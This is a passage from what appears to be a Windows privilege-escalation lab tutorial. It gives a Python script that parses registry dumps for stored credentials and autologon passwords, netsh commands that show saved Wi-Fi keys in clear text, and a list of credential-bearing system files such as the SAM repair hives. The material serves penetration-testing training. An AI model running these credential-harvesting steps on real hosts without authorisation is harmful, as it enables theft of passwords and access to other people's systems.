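    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if KEY_RE.match(line):
            current = line
            tree.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            rtype, value = m["type"], m["value"] or ""
            if rtype in ("REG_DWORD", "REG_QWORD"):
                value = int(value, 16)          # reg query prints 0x-prefixed hex
            tree[current][m["name"]] = (rtype, value)
    return tree


def find_secrets(tree):
    """(key, name, value) for non-empty string values whose name smells like a credential."""
    hits = []
    for key, values in tree.items():
        for name, (_rtype, value) in values.items():
            if SECRET_NAME_RE.search(name) and isinstance(value, str) and value:
                hits.append((key, name, value))
    return hits


def autologon_enabled(tree):
    """True only when Winlogon has AutoAdminLogon=1 AND a DefaultPassword is stored."""
    for key, values in tree.items():
        if key.lower().endswith("\\winlogon"):
            auto = values.get("AutoAdminLogon", ("REG_SZ", "0"))[1]
            password = values.get("DefaultPassword", ("REG_SZ", ""))[1]
            return str(auto) == "1" and bool(password)
    return False


# Constructed sample: PuTTY session as listed above plus an assumed Winlogon key.
SAMPLE = r"""
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
    Present    REG_DWORD    0x1
    HostName    REG_SZ    
    LogFileName    REG_SZ    putty.log
    ProxyMethod    REG_DWORD    0x5
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    administrator
    ProxyPassword    REG_SZ    1_4m_th3_@cademy_4dm1n!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultDomainName    REG_SZ    INLANEFREIGHT
    DefaultPassword    REG_SZ    Kiosk2021!
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
"""

if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE)
    for key, name, value in find_secrets(parsed):
        print(f"{key}\n    {name} = {value}")
    print("autologon armed:", autologon_enabled(parsed))
```

Pipe the output of reg query /s into a file on the target, pull it back, and run parse_reg_query over the whole thing; the name heuristic is deliberately loose (anything with pass, pwd, secret or key), so expect a few false positives such as key-file paths alongside the real finds.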
Wireless network passwords
###List the wireless profiles the host has connected to
C:\htb> netsh wlan show profile
###Show the saved key of one profile in clear text
C:\htb> netsh wlan show profile ilfreight_corp key=clear
Other files worth checking
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*